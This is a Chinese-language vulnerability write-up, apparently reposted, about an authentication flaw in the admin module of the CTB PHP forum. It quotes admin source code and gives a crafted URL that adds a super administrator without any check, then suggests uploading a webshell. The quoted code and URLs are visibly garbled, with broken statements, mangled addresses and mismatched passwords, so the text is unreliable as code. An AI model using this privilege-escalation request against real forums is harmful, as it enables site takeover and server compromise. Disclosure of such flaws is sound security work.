漂亮但不安全的CTB_PHP教程
- WBOY原創
- 2016-07-21 16:08:56805瀏覽
>>>Dedicated This Scrap To CaoJing
涉及版本:
^^^^^^^
目前所有版本(現在1.3Alpha為最高版本)
目前所有版本(現在1.3Alpha為最高版本)
說明:
^^^^^^
CTB是一款由實易數位;開發與維護的原始碼開放的PHP論壇。由於其後台管理文件驗證有缺陷,可能導致非法使用者直接新增論壇超級管理員,進而威脅論壇或伺服器安全。
具體: ^^^^ CTB書寫非常規範,代碼井然有序,賞心悅目,的確是優美的程序;特別是其功能模組,著實讓小弟學習了一把。但安全方面卻令人堪憂:
試看如下程式碼:
/admin/main.php
~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
//取得get變數
if( is_array($_GET) ) {
foreach($_GET as $k=>$v) {
if( is_array( $_GET[$k]) [$k] as $k2=>$v2) {
$return[$k][$k2] = $v2; $return[$k] = }
}
...
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod'];
.".php" {
$mod = "mainright";
}
require_once/1($T.S.php"; -------------------------------------------------- ---------------
//初始化類別變數
$ctb = new Module;
$ctb->set Module;
$ctb->set = $set; $ctb->tplPath = "./templates";
$ctb->input = $return;
$ctb->5
$ctb->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
這裡沒有任何驗證,我們看看新增管理員的檔案:
/admin/systemuser.php
~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Module extends CommonClass
//系統管理模組子類別
{
function execute() {
switch($this->對 $this->addSystemUser();
break;
...
addSystemUser()
{
//輸入資料簡單格式化
$this->inputCheck("main.php?mod=systemuser&action=showSystemUser";
//執行新增操作
[dataPath]."/users/list.php";
$systemLine = $this->select(4, $this->input['systemUserName']);
....
~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
依然沒有驗證,一路順利啊!
使用方法:
^^^^^^^
先註冊一個使用者:
登陸ID: cat
使用者名稱
重複密碼: ilikecat
信箱: cat@dog.com
接著提交下列網址:
http://www.www. php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser
哈哈,你現在已經是超級管理員了,不相信?提交以下URL後台登陸:
http://www.psych.com/ctb/admin/main.php?mod=login
管理名稱: cat
管理密碼: ilikecatike
咦...還真成功了!
你現在是不是想更改後台上傳檔案類型,然後upload webshell?哼,被我猜到了吧...
後記:另外發現CTB代碼註釋有些扎眼的錯字,大煞風景,希望可以一起修正。